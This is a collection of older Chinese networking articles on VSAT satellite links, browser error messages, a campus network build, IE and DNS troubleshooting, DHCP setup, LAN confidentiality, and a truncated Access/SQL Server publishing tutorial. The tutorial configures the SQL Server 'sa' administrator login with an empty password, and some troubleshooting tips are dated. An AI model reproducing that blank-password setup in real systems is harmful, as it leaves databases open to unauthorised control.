VSAT主站采用冗余的网络结构，从中心路由到卫星天线有两条互为备份的线路，每一条线路都有独自的Hub、传输服务器和卫星调制器，当其中一条线路出现故障时，在网络管理系统NMS的控制下会切换到另一条线路，这种设计保证了整个系统的高可用性。

各远端小站只需一个卫星接收天线和一块卫星接收卡。远端PC或LAN服务器通过PSTN进行呼叫信息请求，并由主站进行路由选择，通过其中一个载波下地到卫星接收卡。

2.VSAT系统的特点

1)采取全网状结构，按需求分配信道方式，因而能最佳地利用空间和地面的设备资源；

2)VSAT系统能使信息网络的业务扩展到边远地区，可为费用较高的地区提供优质价廉的解决办法；

3)它符合公用电话交换网(PSTN)和专用网的入网标准；

4)能够在单一平台上提供多种服务，连接到网络上的远端用户能实现诸如高质量电话、视频会议、高速传真、快速下载海量数据等多种业务。

3.VSAT系统的应用

1)宽带Internet接入；

2)交互式商业电视和公司培训；

3)多点广播服务；

4)企业网(Internet)连接；

5)内容数据信息传送。

■Intranet网络

Intranet网络架构视具体应用的需求，有大有小，可繁可简，下面以中型用户为例。

图2 Intranet网络结构图

1.网络设备

中心路由器用来连接卫星网络、Internet和Intranet。

中心路由器应具有以下性能：

1)支持拨号接入服务、路由、LAN到LAN的通信(包括语音、传真和数据)；

2)采用模块化设计，可根据不同的业务需求选择不同的模块(ISDN模块、异步串口模块、同步串口模块、语音模块等)；

3)性能可达5000bps～70000bps；

4)该路由器支持多种路由协议与网络通信协议；

5)支持RS－232、V35等接口；

6)支持SNMP、TFTP、Telnet等网络管理方式；

7)网络操作系统IOS支持用户访问权限认证、Access－List提供网络防火功能。

我们推荐选用Cisco 4000系列路由器。Cisco 4000系列路由器是当今很受欢迎的中档模块化访问路由器，具有很强的灵活性、模块性、高性能和投资保护性，它能支持3个LAN或WAN连接。

2.服务器

可以选择各个档次的Intel Pentium、Pentium Pro、PentiumⅡ、PentiumⅢ服务器。它融合了业界许多的技术：内置单路/多路Fast Wist SCSI、PCI Bridge、FastEthemet，同时支持1～8个CPU、256kB～2GB超大规模的ECC内存、内置热更换硬盘及多路容错电源供给等等。此后根据需要可进一步将其配置成双机、多机负载均衡、主从备份Cluster结构。

■Internet接入

网络中心的Internet接入采用DDN专线接入、ISDN接入、X.25接入、PSTN拨号接入等多种方式。

■天地信息环网应用模式

天地信息环网采用了先进的Internet/Intranet应用模式。

随着当今Internet应用技术的飞速发展，实现全球范围内的大面积的信息共享已成为可能。尤其是Web技术的高度完善，为个人、企业、行业、地区乃至国家大范围实现信息化提供了现实可行的Internet基础。

Internet/Intranet应用模式作为Client/Server模式在深度、广度双向上扩展，其体系可概述为三级结构，其基本框架如图3。

图3 Internet/Intranet应用模式

通道1：通常为SAN中的线路通道。

通道2 ：当用户与Web Server不在同一个LAN中时，通道2为WAN中的路线；当用户与Web Server在一个LAN中时，线路由Client的设置决定。

用户通过使用浏览器在统一的交互界面下，经由通道2跨平台地访问到Web Server，可向Web Server提交自己的查询请求，Web Server根据用户提交的请求经由通道1访问DB Server，并将查询到的数据经通道1传输到Web Server，Web Server再将数据经通道2传给用户。

天地信息环网作为以卫星技术为新的下载传输手段的Internet解决方案，其应用模式的体系结构仍以Internet/Intranet模式为基础，只是在实现上有所不同，如图4所示。

图4 天地信息环网应用模式

客户端通过使用浏览器在统一的交互界面下，通过一般Internet访问方式(拨号ISDN、专线、帧中继等)跨平台地向Web站点服务器提交自己的查询请求，Web站点服务器根据用户提交的请求通过局域网访问到数据库，并将查询到的数据经LAN传输到传输服务器(HTS)，传输服务器将数据通过信号发射站发送给卫星，卫星以广播方式将信号传到所覆盖区域的同一接收频段的所有接收站，接收站上的接收卡通过判断信号包含的IP地址接收传过来的数据信息，并通过Bowser显示给用户。

由于天地信息环网提供较宽的下载带宽，应用系统服务器可为用户提供多种类型的数据服务。而且，天地信息环网解决了因为偏远地区的公众电信服务网带宽较低、联接质量较差而无法实现海量信息高速顺畅下载的问题。

返回


了解网络常见错误信息

《一键清理系统垃圾》

了解网络常见错误信息

    错误信息可能使你受挫，但是它们并不是不能解决的。事实上，一些简单的方法可以使你避免大多数错误信息。以下是一些最常见的互联网错误信息和解决方法
    File contains no data
    当你遇到这种错误时，这意味着你已经进入了正确的网站，但你要的文件却是空的。有一种可能就是网站管理员正在更新这个站点，在这种情况下你可以稍后再进入这个文件。你也可以通过在URL最后的斜线后输入:80来迂回解决问题。
    Helper application not found and Viewer not found
    这些错误发生在当你的浏览器不能识别一个文件时。这通常是在你下载一个需要特定阅读器的文件时发生，例如，一个RealAudio声音文件或一个压缩的Zip文件。如果你没有帮助软件，你最好将文件保存到磁盘上，然后设法获得允许你的浏览器读取文件的应用程序。你会在http://www.browserwatch.com的Browser Watch网站找到你所需要的大多数帮助软件的链接。
    Host unavailable
    这个错误通常发生在当主机服务器关闭时。你可以单击服务器工具栏上的刷新按钮来试着再次进入网站。
    Host unknown and Unable to locate host
    这些错误通常由下列三个原因之一引起：主机服务器关闭、你已断开你的互联网连接、或者你输入了错误的URL。首先试着按一下刷新按钮。如果这种方法行不通，检查一下URL。如果你仍然得到错误信息，请检查你的网络连接。
    Network connection was refused by the server and Too many connections
    稍后再试一下。这些错误常常表明服务器太忙了以致不能应付这样大的流量。你可以按刷新按钮重新连接站点或者稍等一会。
    NNTP server error
    当你试图进入一个USENET新闻组系统而不能访问时，一个NNTP服务器可能出现了错误。这个错误意味着几个可能的问题。像平常情况一样，主服务器可能关闭，或者你输错了URL。也有可能你所选择的新闻组不能通过你的ISP服务商联入，在这种情况下你不能进入新闻组，除非你和ISP服务商联系并使其加入新闻组。另一个可能的错误是你没有正确地设定浏览器的新闻组参数。
    Permission denied
    这条信息发生在当你上传文件到一个FTP站点时。这条信息表明网站管理员不允许上传，网站太忙或者你输入了错误的URL。首先查看一下URL，然后再次输入它。如果错误信息重复出现，你应该稍后再试。如果错误仍然存在，你可以试着发E-mail给站点的网络管理员寻求帮助。
    Unable to locate the server
    这条消息表明你的浏览器不能定位服务器或你没有正确输入URL。仔细检查地址栏中的服务器名，然后试着重新输入URL。
    You can't log on as an anonymous user
    这条信息出现在当你试图进入一部分FTP网站时。它表明网站只允许注册成员，或网站只允许有限数量的非成员访问，在后一种情况时网站只是太忙了。你可以稍后再试，或者如果你是一个注册成员，试着手动用一个FTP软件包输入你的用户ID和密码。

作者：Y.L
来源：ZDNet


面向因特网的校园网

《一键清理系统垃圾》

面向因特网的校园网

    中央党校原有的信息系统建设已经远远落后于党校本身对信息化建设的需要。整个党校还没有建立自己的校园网，没有形成全校规模的计算机使用，即使个别单位走在较前面（如函授学院、财务部、教务部、图书馆等），也是基于规模很小的局域网或单机应用，且硬件设备很落后。在系统规划上，各个部门也仅仅是为了满足本单位的需要，没有一个单位作整个学校信息化建设的总体规划，造成了：
    （1）各个系统、各个部门的信息数据不能共享，乃至部门之间的数据相互矛盾冲突。
    （2）各个部门系统重复建设，浪费了大量的人力物力。
    （3）对以后学校信息化建设的总体规划造成了很大的负担和负面影响。
    （4）由于当前Internet／Intranet技术的迅猛发展，对党校的工作也提出了新的挑战。

    方案选择

    主干网络方案的选择
    当前作为企业网络主干的技术主要有两类，其一为ATM技术，其二为千兆以太网络技术。
    下面我们将对这两种技术在企业网中的应用进行一个简单的分析对比。
    从传统观点来看，ATM技术具备较多的优势，主要体现在以下几个方面：
    ●服务质量保证技术；
    ●在交换节点的处理方面具有快速、简单的优势，有利于提高网络整体的吞吐能力；
    ●在宽带综合服务网络的市场领域占有绝对的优势。
    再看千兆以太网络的优势主要体现在：
    ●由于千兆以太网络从10M、100M以太网络过渡而来，所以在网络技术方面具有不可比拟的简单性，从而具有升级成本低廉的优势；
    ●同时由于绝大多数的桌面用户以及局域网络用户都采用10／100M以太网络技术，所以千兆以太网络作为骨干升级的选择时，具有平滑升级以及兼容性方面的优势。
    从上述的分析中，我们不难看出在传统的观点当中ATM技术具有贵族化的气质，而千兆以太技术则更有平民化的倾向。而且各自的优势分别表现在功能强大或价格低廉等方面。
    随着技术与应用的发展，传统观念中认为ATM技术可以完成很好的服务质量保证已经渐渐弱化，原因就在于多媒体的应用渐渐转到了IP之上。
    相比较而言，千兆以太网络由于其自身的技术发展以及与生俱来的简单性，所以在支持IP多媒体传输方面得到了长足的发展。
    千兆位以太网比起ATM还有一个固有的优点，就是在网络上的流量在协议方面的开销要比ATM少很多，ATM的开销大约是千兆位以太网的两倍。另外，千兆以太网相对ATM技术在价格、维护费用、使用方便性、结构灵活性和易管理性上有着一系列的优势。
    而且在目前的Internet上，实现未来纯ATM端到端网络的情况已经不符合新的应用要求。出现这种情况的主要问题是由于ATM是面向连接的，而IP是动态链接协议，采用路由器来转发数据包，没有端到端连接的建立。而在Internet上，半数的数据流量是与Web有关的。
    总之，千兆以太网络比ATM网络在校园主干网络的发展更具有生命力，更加物美价廉！
    中央党校校园网一期建成的网络结构如图：

    中央党校网络结构示意图
    应用软件平台的选择
    为了实现在中央党校全校范围内的信息共享、协同工作，需要为其建立一套群件系统。在群件系统的平台选择上，我们对比了当今群件软件的两大主流产品Lotus Notes和MS Exchange，并最终选择了Lotus Notes作为中央党校信息集成的平台。我们做出以上选择主要基于以下几点考虑：
    ●由于党校的特殊地位，党校涉及到党和国家的许多机密，所以对整个校园网的安全性要得到充分的保障。Exchange依靠Windows NT，NT又存在着安全隐患，而Exchange本身在这方面并无增强。Exchange和NT的安全保护只有口令一级，如果口令失密，则非法用户就可以长驱直入了。Domino／Notes比Exchange的安全机制的优越之处在于集成性、自成系统的完备性和独立于操作系统的独立性，可以实现集中控制，易于管理，也减少了安全隐患。
    ●Lotus Domino／Notes产品功能特性丰富，使开发者可以容易地以Domino为平台开发出面向协作应用的解决方案。相反，Exchange产品本身功能单一，无法令开发者利用单一的Exchange服务器开发出一个真正的应用。如果用户一开始认为Exchange就可以实现协同办公的应用目标，可在Exchange投入使用不久，就会发现需要集成IIS实现Web发布和访问，需要SQL Server进行数据管理，需要Site Server进行索引．．．．．．这不仅使投资大大增加，而且加剧了信息系统的复杂程度，使系统管理和应用开发的代价大大增加。
    ●Exchange必然使用NT操作系统，但NT在应用服务器和Web服务器领域依然不敌Unix和主机系统。由于中央党校的直属部门较多，信息吞吐量较大，对系统的稳定性和安全性要求较高，因此，我们选择了Sun Enterprise Server作为信息系统的主服务器，并实施HA方案，双机备份提高系统的可靠性。

    连接Internet解决方案

    中央党校采用无线方式接入国际互联网。具体方案是，以微波与中科院网络中心互连，连接速率为3M，在中科院网络中心和中央党校分别配备微波传输设备以及网络接入设备。
    根据国家安全部的有关规定，中央党校校园网与Internet不能直接相连，必须物理断开。中央党校Internet接入网由一个内部网和一个外部网组成。为了满足校园网用户了解国际及科技最新动态、浏览及查询国际互联网的需求，我们为中央党校推荐曙光信息产业有限公司产品———曙光“天罗”转播系统V2．0及曙光“天罗”搜索引擎。

    中央党校Internet接入网络拓扑图
    ●系统组成
    曙光“天罗”转播系统由信息采集器及Web Server两部分组成。采集器由一台或多台内装Windows 95／98＋曙光“天罗”转播系统用户端软件构成，Web Server由一台安装AIX4．3操作系统和曙光“天罗”转播系统Server端软件的曙光天演服务器构成。
    ●工作流程
    曙光“天罗”信息转播系统的工作分两步进行：
    1．信息的采集
    曙光天演服务器与Internet接入网互连，并与党校的局域网断开，信息采集器也连接到这个网上。这样，信息采集器从以太网上采集的数据被送到曙光天演服务器的曙光“天罗”转播系统Server中，完成了数据的采集过程。
    2．局域网用户（包括拨号用户）的Internet网上浏览
    曙光天演服务器与Internet接入网断开，并与中央党校的局域网互连。这样，中央党校的局域网的用户和拨入中央党校的局域网的用户，就可以使用通用的WWW浏览器对曙光“天罗”转播系统Server中已经采集的数据进行浏览及查询。
    运行效果

    在中央党校和联想集成的通力合作下，中央党校校园信息网业已建成并在9月1日新学年开始时交付使用。在进行硬件和网络集成的同时，联想集成还组织人力进行中央党校应用软件的开发。目前已建成中央党校主页，开通了校委办公自动化系统，完成了党校内一些直属单位原有部门信息系统的网络迁移工作，实现了信息共享和协同工作。由联想集成搭建的该校园网将进一步加快党校信息化建设的步伐，推进党政干部培训工作步入信息时代，并肩负起信息社会的发展对干部教育事业的历史要求。

返回


能上QQ但不能上网问题精解

《一键清理系统垃圾》

能上QQ但不能上网问题精解

一、感染了病毒所致

    这种情况往往表现在打开IE时，在IE界面的左下框里提示：正在打开网页，但老半天没响应。在任务管理器里查看进程，（进入方法，把鼠标放在任务栏上，按右键—任务管理器—进程）看看CPU的占用率如何，如果是100%，可以肯定，是感染了病毒，这时你想运行其他程序简直就是受罪。这就要查查是哪个进程贪婪地占用了CPU资源。

    找到后，最好把名称记录下来，然后点击结束，如果不能结束，则要启动到安全模式下把该东东删除，还要进入注册表里，（方法：开始—运行，输入regedit）在注册表对话框里，点编辑—查找，输入那个程序名，找到后，点鼠标右键删除，然后再进行几次的搜索，往往能彻底删除干净。

    有很多的病毒，杀毒软件无能为力时，唯一的方法就是手动删除。

二、与设置代理服务器有关

    有些筒子，出于某些方面考虑，在浏览器里设置了代理服务器（控制面板--Internet选项—连接—局域网设置—为LAN使用代理服务器），设置代理服务器是不影响QQ联网的，因为QQ用的是4000端口，而访问互联网使用的是80或8080端口。这就是很多的筒子们不明白为什么QQ能上，而网页不能打开的原因。而代理服务器一般不是很稳定，有时侯能上，有时候不能上。如果有这样设置的，请把代理取消就可以了。

三、DNS服务器解释出错

    所谓DNS，即域名服务器（Domain Name Server）,它把域名转换成计算机能够识别的IP地址，如深圳之窗（www.sz.net.cn）对应的IP地址是219.133.46.54，深圳热线（www.szonline.net）对应的IP地址是202.96.154.6。如果DNS服务器出错，则无法进行域名解释，自然不能上网了。
如果是这种情况，有时候是网络服务接入商即ISP的问题，可打电话咨询ISP；有时候则是路由器或网卡的问题，无法与ISP的DNS服务连接。

    这种情况的话，可把路由器关一会再开，或者重新设置路由器。或者是网卡无法自动搜寻到DNS的服务器地址，可以尝试用指定的DNS服务器地址。在网络的属性里进行，（控制面板—网络和拔号连接—本地连接—右键属性—TCP/IP协议—属性—使用下面的DNS服务器地址）。不同的ISP有不同的DNS地址，如电信常用的是202.96.134.133(主用) 202.96.128.68（备用）。

    更新网卡的驱动程序或更换网卡也不失为一个思路。
四、系统文件丢失导致IE不能正常启动

这种现象颇为常见，由于：

    1、系统的不稳定 表现为死机频繁、经常莫名重启、非法关机造成系统文件丢失；

    2、软硬件的冲突 常表现为安装了某些程序引起网卡驱动的冲突或与IE的冲突。自从INTEL推出超线程CPU后，有一个突出的问题是XP SP1下的IE6与超线程产生冲突；

    3、病毒的侵扰 导致系统文件损坏或丢失。

    如果是第一种情况，可尝试修复系统，2K或XP系统下，放入原安装光盘（注意：一定要原安装光盘），在开始—运行里输入sfc /scanow，按回车。98的系统也可以用sfc命令进行检查。

    如果是第二种情况，可以把最近安装的硬件或程序卸载，2K或XP的系统可以在机器启动后，长按F8，进入启动菜单，选择“最后一次正确的配置”，若是XP系统，还可以利用系统的还原功能，一般能很快解决问题。

    如果是XP的系统因超线程CPU的原因，可以在BIOS里禁用超线程，或升级到SP2。（当然，XP如何升级SP2涉及到很多知识及要注意的问题，在此限于篇幅不再详述）。这种情况下，QQ里自带的TT浏览器一般能正常浏览，可改用一试。

    如果是第三种情况，则要对系统盘进行全面的查杀病毒。

    还有一种现象也需特别留意：就是能打开网站的首页，但不能打开二级链接，如果是这样，处理的方法是重新注册如下的DLL文件：

    在开始—运行里输入：
regsvr32 Shdocvw.dll
regsvr32 Shell32.dll　（注意这个命令，先不用输）
regsvr32 Oleaut32.dll
regsvr32 Actxprxy.dll
regsvr32 Mshtml.dll
regsvr32 Urlmon.dll
regsvr32 Msjava.dll
regsvr32 Browseui.dll

    注意：每输入一条，按回车。第二个命令可以先不用输，输完这些命令后重新启动windows，如果发现无效，再重新输入一遍，这次输入第二个命令。还有，如果是98的系统，到微软的网站上下载这个文件也许更简单，这个文件的下载地址是：
http://download.microsoft.com/download/msn...us/mcrepair.exe

五、IE损坏

    以上方法若果都不奏效，有可能是IE的内核损坏，虽经系统修复，亦无法弥补，那么重装IE就是最好的方法了。

    如果是98或2K系统，IE的版本若是5.0，建议升级到6.0。

    98的系统如果已经升级安装了6.0，那么在控制面板里点击添加/删除程序，将会弹出一个修复对话框，选择默认的修复，重新启动即可。

    如果是2K+IE6.0或XP（自带的IE就是6.0的）的系统，重新IE有点麻烦，有两种方法：
    1、打开注册表，展开HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{ 89820200-ECBD-11cf-8B85-00AA005B4383 }，将IsInstalled的DWORD的值改为0即可；
    2、放入XP安装光盘，在开始—运行里输入“rundll32.exe setupapi,InstallHinfSection DefaultInstall 132%windir%Infie.inf”

    注：重装IE并不一定就能解决问题，仅是一个处理问题的思路而已。

作者：
来源：enet


配置DHCP可防IP地址冲突

《一键清理系统垃圾》

配置DHCP可防IP地址冲突

    在分配网络地址时，令我们最头疼的是经常会出现IP地址冲突问题。尽管我们可以通过交换机划分VLAN指定网关，在一定范围内限制IP地址的更改，但是IP地址冲突在小范围内还是存在的，如何解决这个问题？我们可采用配置DHCP（Dynamic Host Configuration Protocol，动态主机配置协议）的方法加以解决。DHCP是在TCP/IP网络上使客户机获得配置信息的协议，具有自动分配可用网络地址等功能。下面让我们看看如何在Windows 2000下对DHCP进行具体配置。

    DHCP添加

    打开“控制面板→添加/删除程序→添加/删除Windows组件→网络服务”，选中“动态主机配置协议DHCP”。

    网络属性设置

    打开“控制面板→网络和拨号连接→本地连接→属性→Internet协议（TCP/IP）→属性→使用下面的IP地址”，其中：IP地址为192.168.0.1，子网掩码为255.255.255.0，其他可不用改。也可给服务器多设几个IP地址，比如选择“高级→添加”，再增加一个IP地址为192.168.0.2，子网掩码为255.255.255.0。

    动态主机配置

    1. 调用DHCP：打开“开始→程序→管理工具→DHCP”。

    2. 添加DHCP服务器：单击鼠标右键，选择“添加服务器→浏览”，选中要添加的服务器名。

    3. 设置DHCP服务器：选中服务器名，单击鼠标右键，选择“新建作用域”。其中：在“作用域名”中，“名称”项可任填一个名称；在“IP地址范围”中，填写好“起始IP地址”项（如 “192.168.0.10”），填写好“结束IP地 址”项（如“192.168.0.244”），填写好“子网掩码”项（如“255.255. 255.0”）；在“添加排除”中，如果有必要可填写服务器不分配的地址或地址范围，否则直接选择[下一步]；“租约期限”可设一年（即365天）；依次配置分配给工作站的默认的网关、DNS、WINS，均填写并添加如下IP地址：192.168.0.1。

    DHCP向网络主机提供配置参数，它由两个基本部分组成：一部分是向网络主机传送专用的配置信息，另一部分是给主机分配网络地址。DHCP基于服务器/客户模式，在这种模式下，由专门指定的主机（被称为服务器）分配网络地址，传送网络配置参数给需要的网络主机（被称为客户）。哪台主机作为DHCP服务器需要由网络管理员进行人为指定。


普通电话线组建企业Internet／Intranet

《一键清理系统垃圾》

普通电话线组建企业Internet／Intranet

组网说明

    ●局域网通过电话线互联，取代DDN数据专线：2～4根电话线捆绑，传输速率超过256kbps 。
    ●广域网接口速率可随时调整
    ●路由功能按最小往返时间算法实现
    ●按客户／服务器方式组建广域网
    ●可实现多个虚拟子网
    适用应用对象：
    ●所在地域DDN数据专线不普及
    ●无法或不愿承担数据专线的高额费用
    ●经常需要使用临时性网络，有不定期高速率要求
    ●希望维护简单，不愿聘请专职的系统工程师

    应用类型

    ●分布式企业管理网络
    ●区域内行业管理信息网络
    ●商业应用系统网络
    ●信息服务系统网络
    ●Internet／Intranet建设
    ●临时性可变化组网

    组网应用实例

    NetLinker系列产品适用于多种类型的网络系统，其 领域可包括政府、教育、金融、税务、商业、医疗、邮电 、服务、体育比赛等。

    组网两种形式

    ●通过ISP接入，连入Internet形成跨地区的网络形式。
    ●企业及单位自己的区域性Intranet专用网络。
    （1）分布式跨地域广域网
    （2）区域性城域网
    （3）同区不同楼园区网

    组网类型的案例说明

    （1）分布式企业管理信息类网络:
    ———面向大型实时性高的联机事物处理。
    商业系统：对于超市、百货的连锁经营和企业集团管理，利用市话线路丰富的资源，可以成功地构成网络环境，使各分系统接入中心服务器，以实现跨地区的连锁经营，有利于实现统一管理和统一结算，做到快速、准确、完全。
    金融系统：既可作为广域网络连接的备份线路，也可用于区县级网络连接，实现电子联行及通存通兑业务。
    医疗系统：可实现跨地区的同城医疗网络系统，实现医疗系统如大病统筹综合管理、急救信息系统（病历档案、救助卡管理）和医疗医药信息服务。对于医院内部网络，在分布不同的楼宇和办公区，使用NetLinker系列产品，在楼宇内可以把各个计算机诊疗或管理系统局域网通过利用内部程控交换机线路，将各个局域网与中央区主机相连。
    （2）灵活组网类:
    适用于展览会、各种大型活动和体育比赛等临时场地的网络系统。例如对于体育比赛，可通过NetLinker
系列产品组网快速简便维护的特点形成大型体育跨区域网络，这种局域网和广域网形式适合场所灵活多变的特点，又能节省开支。
    （3）信息服务类:
    服务行业：可实现跨地区各种信息服务（例如ISP服务、各种连机事物处理的实现等）；实现办公室、出差旅途用户人员上网，接收电子邮件、文件存取、信息检索等等；实现信息发布机构的信息多媒体的远程传送。
    （4）园区网类:
    各类大专院校、研究院、设计院：在无法组建光纤网络的情况下，可利用园区现有通信设备———程控交换机系统，实现现代化管理，快速组建园区内计算机网络，实现办公现代化。
    （5）城域网:
    在地县范围内既不可能组建光纤网络，也不可能铺设DDN／X．25专用线路，电话网连网形式将成为互连的主要形式。

    例如某省农业信息中心网络系统，地县网络通过省市电话网同省农业信息中心拨号连接，实现跨地区网络连网系统，形成省－市－县分级结构网络。
    天津市金桥网络有限公司认为：
    1．系统组网参数配置简单可靠，可在浏览器界面下顺利组网，使用过程中无需专业人员维护，网络系统运行可靠，长期工作。
    2．该产品具有灵活的用户接入端口，局域网用户和远程拨号用户均可随时入网，管理方便有效。
    3．系统设有记费管理，对不同用户都有详细的记帐功能，一方面可以作为审计资料，另一方面可以统计通信费用。
    4．拨号上网用户在接入NetLink－er1000使用与原网使用相比，该产品具有明显的速度提高，得到用户的认可。

返回


奇特网络故障排除

《一键清理系统垃圾》

奇特网络故障排除

    现象：电脑配置为赛扬900MHz、Realtek 8139 PCI网卡等，一直通过服务器共享ADSL上网，上网时异常关机，之后出现无法上网的情况，但其它操作正常。
    解决过程：本着先软后硬的原则，首先我先用杀毒软件检查了一遍，并没有发现异常情况，然后我怀疑是不是系统网络部分有问题，经查看网络属性，各种参数设置均正确，查看网上邻居，找不到服务器，Ping服务器IP，也没有响应，我想那可能就是操作系统出现了异常或网卡出现了故障。
    重新安装系统太浪费时间，因此先检查硬件设备——通过替换法检查，检查网卡和双绞线都没有问题，基本上可以断定是系统软故障，将网卡驱动删除重新安装，依然无法使用，无意中将网卡换了一个PCI插槽，故障消失。
    分析原因：这是非法关机造成了操作系统网络部分异常，但是无法通过正常手段排除，更换PCI插槽之后，随着中断等设置的改变，网络驱动经过重新配置恢复了正常。


企业局域网的保密工作

《一键清理系统垃圾》

企业局域网的保密工作

    我国的计算机网络，特别是局域网技术发展最为迅速，许多大专院校、科研院所以及银行、公安、邮电、铁路、石油等部门都建立了自己的局域网，但在实际运作中，由于一些网络是没有保密措施的“裸网”，用户不敢在网上处理涉密信息，使网络的作用得不到充分发挥。因此，开发和运用有效的局域网保密措施，树起坚实的保密防护网，无论现在还是将来都具有十分突出的现实意义。

局域网信息的保密

    计算机局域网由信息(存储在计算机及其外部设备上的程序及数据)和实体两大部分组成，信息泄露是局域网的主要保密隐患之一。所谓信息泄露，就是被故意或偶然地侦收、截获、窃取、分析、收集到系统中的信息，特别是秘密信息和敏感信息，从而造成泄密事件。局域网在保密防护方面有三点脆弱性：一是数据的可访问性。数据信息可以很容易被终端用户拷贝下来而不留任何痕迹。二是信息的聚生性。当信息以零散形式存在时，其价值往往不大，一旦网络将大量关联信息聚集在一起时，其价值就相当可观了。三是设防的困难性。尽管可以层层设防，但对一个熟悉网络技术的人来说，下些功夫就可能突破这些关卡，给保密工作带来极大的困难。
    从某种意义上可以说，网络的生命在于其保密性。根据近几年的实践和保密技术发展的要求，计算机局域网的保密防范应从以下四个方面入手：
    （1）充分利用网络操作系统提供的保密措施。某些用户对网络的认识不足，基本不用或很少使用网络操作系统提供的保密措施，从而留下隐患。其实，一般的网络操作系统都有相应的保密措施，以美国Novell公司的网络操作系统NetWare为例，它提供的四级保密措施：第一级是入网保密。用户入网时，必须按用户名进行登录注册。使用网络信息资源的用户,必须准确申报自己的用户名,否则将被网络拒之门外。第二级是设置目录和文件访问权限。访问权限是对用户访问目录和文件的合法范围的规定，以控制用户只能操作什么样的目录和文件。准确地划分网络信息的涉密等级、范围和涉密人员，需要网络管理员和保密人员协同工作。第三级是文件和目录的属性保密。属性直接控制对文件或目录的访问特性。属性的访问控制高于文件、目录的有效访问权限，可以禁止有效访问权限所允许的操作。NetWare提供的主要属性控制有：防止对目录和文件的删除；不允许查看目录和文件；禁止对文件进行拷贝；禁止对文件的写操作；控制对文件是否共享；防止文件修改时被破坏；标记被修改过的文件等。第四级是文件服务器的安全保密。即控制台键盘可以加口令封锁，防止非法闯入者以超级用户身份浏览网络信息。
    （2）加强数据库的信息保密防护。网络中的数据组织形式有文件和数据库两种。文件组织形式的数据缺乏共享性，现已成为网络存储数据的主要形式。由于操作系统对数据库没有特殊的保密措施，而数据库的数据以可读的形式存储其中，所以数据库的保密需采取另外的方法。
    （3）采用现代密码技术，加大保密强度。借助现代密码技术对数据进行加密，将重要秘密信息由明文变为密文。
    （4）采用防火墙技术，防止局域网与外部网连通后秘密信息的外泄。局域网最安全的保密方法莫过于不与外部联网（国家规定涉及国家秘密的局域网不得与外部联网），但除了一些重点单位和要害部门，局域网与广域网的连接是大势所趋。防火墙是建立在局域网与外部网络之间的电子系统，用于实现访问控制，即阻止外部入侵者进入局域网内部，而允许局域网内部用户访问外部网络。

局域网实体的保密

    局域网实体是指实施信息收集、传输、存储、加工处理、分发和利用的计算机及其外部设备和网络部件。它的泄密渠道主要有四个：
    （1）电磁泄露。计算机设备工作时辐射出电磁波，任何人都可以借助仪器设备在一定范围内收到它，尤其是利用高灵敏度的仪器可以稳定、清晰地看到计算机正在处理的信息。另外，网络端口、传输线路等都有可能因屏蔽不严或未加屏蔽而造成电磁泄露。实验表明，未加控制的电脑设施开始工作后，用普通电脑加上截收装置，可以在一千米内抄收其内容。
    （2）非法终端。非法用户有可能在现有终端上并接一个终端，或趁合法用户从网上断开时乘机接入，使信息传到非法终端。
    （3）搭线窃取。局域网与外界连通后，通过未受保护的外部线路，可以从外界访问到系统内部的数据，而内部通讯线路也有被搭线窃取信息的可能。
    （4）介质的剩磁效应。存储介质中的信息被擦除后有时仍会留下可读信息的痕迹。另外，在大多数的信息系统中，删除文件仅仅是删掉文件名，而原文还原封不动地保留在存储介质中，一旦被利用，就会泄密。
    对局域网实体，采取的相应保密措施一般有以下三种：一是防电磁泄露措施。如选用低辐射设备。显示器是计算机保密的薄弱环节，而窃取显示的内容已是一项“成熟”的技术，因此，选用低辐射显示器十分必要。此外，还可以采用距离防护、噪声干扰、屏蔽等措施，把电磁泄露抑制到最低限度。二是定期对实体进行检查。特别是对文件服务器、光缆(或电缆)、终端及其他外设进行保密检查，防止非法侵入。三是加强对网络记录媒体的保护和管理。如对关键的涉密记录媒体要有防拷贝和信息加密措施，对废弃的磁盘要有专人销毁等。


企业网站数据装入及发布

《一键清理系统垃圾》

企业网站数据装入及发布

问题的提出
    在企业网站的开发维护中，经常要把企业的各种信息，例如字处理文件、电子表格、图形、网页等文件装入SQL数据库（SQLServer7.0）中，然后在企业网站上发布。这项工作非常费时费力，操作起来比较繁琐，特别是每日都有大量信息录入及发布时，更是如此。能否建立一个应用界面，能够搜索指定目录下的各类文件，并将数据显示出来，经过选择后装入SQL数据库，并随即发布到企业网站上，而且对已入库的信息数据要随时编辑、修改、删除。根据这个问题，我们在开发企业网站的过程中采取了一些方法，使这个问题得到了较好的解决。现将解决这一问题的思路和程序编制的实际步骤发表出来，供有兴趣的同行参考。

    解决问题的思路

    １． 采用Web浏览器控件作为信息的录入窗口。

    ２． 采用Access2000数据项目作为客户／服务器模式，用于SQL数据库的用户界面。

    ３． 采用Access2000数据访问页作为网站发布载体，结合报表快照控件即时发布。

    实际操作步骤：

    １． 建数据项目

    在Windows 2000/NT系统中，可按以下步骤创建：

    * 打开Access数据库窗口,选文件选单中的“新建”命令，创建一个“项目（新建数据库）”，输入文件名：adp1。

    * 在“Microsoft Sql Server数据库向导”中，选Sql Server数据库系统名：sqlser，“登录ID”：sa，“密码”：为空，“指定SQL Server数据库名”：adp1sql，单击“完成”即可进入“adp1：数据库”窗口

    * 测试连接。 列名 数据类型 长度 精度
Xh int 4 10
Lb char 10 类别
Ml char 30 目录
wb ntext 16 文本
Rq datetime 8 日期
Tm char 30 题目
Bg image 16 表格

    在Windows98系统中，按以下步骤创建项目连接。

    * 用SQL Server客户网络实用工具（client network utility）：选“命名管道（named pipes）”。

    * 打开默认网络库：选“TCP/IP”

    * 添加网络配置库：输入有“Sql server 7.0“的计算机名作为网络别名。

    * 验证：数据连接特性。

    ２． 使用设计器创建表

    * 在“adp1:数据库”窗口的表页中，“使用设计器创建表”创建一个新的表，“选择表名”：table1.

    * 选“table1：表”输入下表字段：

    ３． 视图的设计

    为了在数据访问页的题目“下拉列表”中指定不同类别的文件，要分别建立两个分类查询视图（可按文件的类别创建多个视图）。创建过程（略）。

    ４． 创建用户界面窗体

    * 在“adp1数据库”窗体页中“使用向导创建窗体”，创建一个新的窗体。在窗体向导对话框中将“表／视图”选“表：table1”；“选定的字段按“〉〉”键全部选定，单击“完成”。

    * 在“table1:窗体”的“设计视图”工具箱中选“绑定对象框”，在“设计视图”窗口画一个合适的方框，插入“绑定对象框：OLE绑定”控件。在该控件“属性”的“控件来源”设为：BG。其它“属性”值为默认设置。

    * 在窗体上添加以下控件和相应的“事件过程”代码：

